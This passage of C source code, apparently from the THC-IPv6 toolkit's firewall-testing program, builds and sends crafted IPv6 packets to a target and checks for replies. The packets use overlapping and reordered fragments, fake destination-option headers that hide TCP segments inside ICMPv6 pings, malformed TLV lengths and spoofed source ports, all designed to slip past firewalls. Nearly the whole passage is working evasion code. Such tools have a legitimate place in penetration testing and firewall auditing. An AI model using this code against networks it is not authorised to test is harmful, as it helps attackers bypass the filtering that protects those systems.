only == 0) { printf("Test %2d: frag type first #2 (overlap)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); // interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0 thc_send_as_overlapping_first_fragment6(interface, src, dst, NXT_ICMP6, hdr->pkt + 40, hdr->pkt_len - 40, 1232, 0); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type first #3 (resend#2)\t", count); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, sport + count) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ECHOREQUEST, 0, count, (unsigned char *) &buf, 12, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; pkt = thc_destroy_packet(pkt); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) < 0) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) 
return -1; pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type first #4 (resend#2L)\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 1, sport + count) < 0) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ECHOREQUEST, 0, count, (unsigned char *) &buf, 0, 0) < 0) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; pkt = thc_destroy_packet(pkt); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, sport + count) < 0) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, NULL, 0) == -1) return -1; } while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type middle+last\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, 
dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type middle(first)+last\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = 
thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type last\t\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; while (thc_pcap_check(p, (char 
*) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 1232 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_ICMP6, hdr->pkt + 1232 + 40 + offset, 1232) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2464 / 8, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_TCP, hdr->pkt + 2464 + 40 + offset, hdr->pkt_len - 2464 - 40 - do_hdr_size) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: frag type last #2\t\t", count); poffset = 0; ptype = NXT_FRAG; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 2500) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 2500) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr 
*) pkt; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); // interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0 thc_send_as_overlapping_last_fragment6(interface, src, dst, NXT_ICMP6, hdr->pkt + 40, hdr->pkt_len - 40, 1232, 0); pkt = thc_destroy_packet(pkt); check_for_reply(); curr++; } if (only == ++count || only == 0) { printf("Test %2d: overlapping ping first\t\t", count); poffset = 0; ptype = NXT_FRAG; memset(buf, 0, 1024); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt3, &pkt_len3, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt3, &pkt_len3, buf, 6) == -1) return -1; if (thc_add_icmp6(pkt3, &pkt_len3, ICMP6_ECHOREQUEST, 0, sport + count, buf, 8, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3) == -1) return -1; hdr3 = (thc_ipv6_hdr *) pkt3; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset, 16) == -1) return -1; if 
(thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr->pkt + 40 + offset + 16, hdr->pkt_len - 40 - offset - 16) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 8 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset + 8, 24) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); pkt3 = thc_destroy_packet(pkt3); pingtest = 1; check_for_reply(); pingtest = 0; curr++; } if (only == ++count || only == 0) { printf("Test %2d: overlapping ping last\t\t", count); poffset = 0; ptype = NXT_FRAG; memset(buf, 0, 1024); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 0) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 0) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = 
(thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt3, &pkt_len3, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt3, &pkt_len3, buf, 6) == -1) return -1; if (thc_add_icmp6(pkt3, &pkt_len3, ICMP6_ECHOREQUEST, 0, sport + count, buf, 8, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3) == -1) return -1; hdr3 = (thc_ipv6_hdr *) pkt3; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset, 16) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 8 / 8, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset + 8, 24) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr->pkt + 40 + offset + 16, hdr->pkt_len - 40 - offset - 16) == -1) return -1; if (thc_generate_and_send_pkt(interface, 
srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); pkt3 = thc_destroy_packet(pkt3); pingtest = 1; check_for_reply(); pingtest = 0; curr++; } if (only == ++count || only == 0) { printf("Test %2d: resend 2nd fake pkt\t\t", count); poffset = 0; ptype = NXT_FRAG; memset(buf, 0, 1024); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if (udp == 0) { if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 40) == -1) return -1; } else { if (thc_add_udp(pkt, &pkt_len, sport + count, port, 0, buf, 40) == -1) return -1; } if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt; if ((pkt3 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len3, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt3, &pkt_len3, buf, 14) == -1) return -1; if (thc_add_hdr_dst(pkt3, &pkt_len3, buf, 6) == -1) return -1; if (thc_add_icmp6(pkt3, &pkt_len3, ICMP6_ECHOREQUEST, 0, sport + count, buf, 32, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt3, &pkt_len3) == -1) return -1; hdr3 = (thc_ipv6_hdr *) pkt3; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 0, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset, 16) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = 
thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr3->pkt + 40 + offset + 16, 32) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 2, 1, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr->pkt + 40 + offset + 16, 32) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 512 - 2) == -1) return -1; if (thc_add_hdr_fragment(pkt2, &pkt_len2, 6, 0, sport + count) == -1) return -1; if (thc_add_data6(pkt2, &pkt_len2, NXT_DST, hdr->pkt + 40 + offset + 48, hdr->pkt_len - 40 - offset - 48) == -1) return -1; if (thc_generate_and_send_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); pkt3 = thc_destroy_packet(pkt3); pingtest = 1; check_for_reply(); pingtest = 0; curr++; } if (only == ++count || only == 0) { printf("Test %2d: Bad TLV handling\t\t", count); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 6) == -1) return -1; buf[0] = 1; // T buf[1] = 12; // L if 
(thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; memset(buf, 0, sizeof(buf)); if (thc_add_hdr_hopbyhop(pkt2, &pkt_len2, buf, 6) == -1) return -1; buf[0] = 1; // T buf[1] = 4; // L if (thc_add_hdr_dst(pkt2, &pkt_len2, buf, 6) == -1) return -1; if (thc_add_tcp(pkt2, &pkt_len2, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt2; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ECHOREQUEST, 0, count, hdr->pkt + hdr->pkt_len - 20, 20, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); pingtest = 1; check_for_reply(); pingtest = 0; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); memset(buf, 0, sizeof(buf)); curr++; } if (only == ++count || only == 0) { printf("Test %2d: Bad TLV handling #2\t\t", count); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; buf[0] = 1; // T buf[1] = 12; // L if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; buf[0] = 1; // T buf[1] = 12; // L buf[6] = NXT_TCP; // fake dst hdr buf[7] = 1; // 16 byte length of fake hdr, jumping over 8 byte of icmp hdr buf[8] = 1; // T fake buf[9] = 12; // L fake if (thc_add_hdr_dst(pkt, &pkt_len, buf, 14) == -1) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_tcp(pkt2, &pkt_len2, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, NULL, 0) == -1) return -1; if 
(thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt2; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ECHOREQUEST, 0, count, hdr->pkt + hdr->pkt_len - 20, 20, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); pingtest = 1; check_for_reply(); pingtest = 0; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); memset(buf, 0, sizeof(buf)); curr++; } if (only == ++count || only == 0) { printf("Test %2d: Bad TLV handling #2 reverse\t", count); memset(buf, 0, sizeof(buf)); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; buf[0] = 1; // T buf[1] = 12; // L if (thc_add_hdr_dst(pkt, &pkt_len, buf, 6) == -1) return -1; buf[0] = 1; // T buf[1] = 12; // L buf[6] = NXT_ICMP6; // fake dst hdr buf[7] = 3; // 32 byte length of fake hdr, jumping over 24 byte of tcp hdr buf[8] = 1; // T fake buf[9] = 28; // L fake if (thc_add_hdr_dst(pkt, &pkt_len, buf, 14) == -1) return -1; if ((pkt2 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len2, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt2, &pkt_len2, ICMP6_ECHOREQUEST, 0, count, NULL, 0, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt2, &pkt_len2) == -1) return -1; hdr = (thc_ipv6_hdr *) pkt2; memset(hdr->pkt + hdr->pkt_len - 12, 0, 4); if (thc_add_tcp(pkt, &pkt_len, sport + count, port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, hdr->pkt + hdr->pkt_len - 12, 12) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, 
&pkt_len) == -1) usleep(1); pingtest = 1; check_for_reply(); pingtest = 0; pkt2 = thc_destroy_packet(pkt2); pkt = thc_destroy_packet(pkt); memset(buf, 0, sizeof(buf)); curr++; } if (only == ++count || only == 0) { i = 0; ch = 'a'; is_srcport = 1; if (udp == 0) { while (sports[i] != -1) { printf("Test %2d%c: plain with srcport %d \t", count, ch++, sports[i]); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_tcp(pkt, &pkt_len, sports[i], port, sport + count, 0, TCP_SYN, 0x3840, 0, NULL, 0, buf, 0) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); i++; } } else { while (sports2[i] != -1) { printf("Test %2d%c: plain with srcport %d \t", count, ch++, sports2[i]); poffset = 0; ptype = -1; if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 64, 0, count, 0, 0)) == NULL) return -1; if (thc_add_udp(pkt, &pkt_len, sports2[i], port, 0, buf, 1000) == -1) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) == -1) return -1; while (thc_pcap_check(p, (char *) ignoreit, NULL) > 0); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); while (thc_send_pkt(interface, pkt, &pkt_len) == -1) usleep(1); check_for_reply(); pkt = thc_destroy_packet(pkt); i++; } } curr++; is_srcport = 0; } /* ----------------- END OF TEST CASES ---------------- */ printf("\nDone.\n"); thc_pcap_close(p); return 0; } thc-ipv6-2.5/CHANGES0000644000000000000000000005057012256501006012515 